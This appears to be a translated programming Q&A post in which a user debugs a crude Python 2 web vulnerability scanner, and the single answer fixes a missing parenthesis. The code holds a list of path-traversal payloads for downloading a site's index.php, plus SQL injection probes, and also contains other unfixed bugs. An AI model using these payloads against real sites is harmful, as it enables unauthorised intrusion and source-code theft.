在同一个函数中打开两个url时出错

时间:2015-08-03 20:41:42

标签: python

我正在尝试编写一个简单的Web应用程序。该应用程序是一个扫描仪。这是我的代码:

import os, sys, urllib2, re, urlparse

l = []
n_l = []
b_l = []

def url(url):
  if not url.startswith('http://'):
    url = 'http://'+url
  else:
    url = url
  return url

def get_links(url):
 try:
  res = urllib2.urlopen(url)
  print 'Loading ',url
  print 'Status ',res.getcode()
  string = res.read()

  for link in re.findall(r'href=[\'"]?([^\'" >]+)', string):
    if not link.startswith('http://'):
        link = urlparse.urljoin(url, link)
    else:
        link = link
        l.append(link)
 except Exception, e:
        print str(e)

def transvers(app):
   for rl in l:
      if '?' and '=' in rl:
        rl = rl.split('=')[0]+'='
        rl = rl + app
        print 'Download Index.php from %s'%rl
        try:
         fi_le = urllib2.urlopen(rl)
         output = open('index.php','a')
         output.write(fi_le.read())
         output.close()
        except Exception, exceptions:
           print str(exceptions)

def sql_url():
    for c in l:
        if '=' in c:
           if c.endswith(('1', '2', '3', '4', '5', '6', '7', '8', '9', '0')):
              n_l.append(c+"'") 
              b_l.append(c+' AND 1 = 0')

def sql_test():
    for inj in n_l:
         responz = urllib2.urlopen(inj).read()
         print 'Trying SQL injection in %s'%inj
         if 'error in your SQL syntax' in responz:
             print 'SQL BUG FOUND IN %s'%inj
         else:
             print 'SQL bug not found in %s'%inj

def blind_injection():
    for blnd in b_l:
       rspn = urllib2.urlopen(blnd).read()
       print 'Opening ......... %s'%blnd
       rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0].read()
       print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
       print 'Comparing output'
       if rspn == rsp:
          print 'Blind SQL injection bug not found in %s'%blnd
       else:
          print 'BLIND SQL IJECTION BUG FOUND IN %s'%blnd

def main():
  ins =  url(sys.argv[1])
  get_links(ins)
  col = ['../index.php', '%2e%2e%2findex,php', '%2e%2e/index.php', '..%2findex.php', '%2e%2e%5cindex.php', '%2e%2e\index.php', '..%5cindex.php','%252e%252e%255cindex.php', '..%255cindex.php','..%c0%afindex.php','..%c1%9cindex.php']
  for h in col:
      transvers(h)
    sql_url()
    sql_test()
    blind_injection()

main()

blind_injection()函数外,一切正常。这将返回错误

File "dt.py", line 57
    print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
        ^
SyntaxError: invalid syntax

如何解决此错误?

1 个答案:

答案 0 :(得分:2)

你有一个问题,你在[0]之后缺少一个结束语,这导致错误而不是print语句:

 rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0].read() 
                                                  ^^

应该是:

rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0]).read()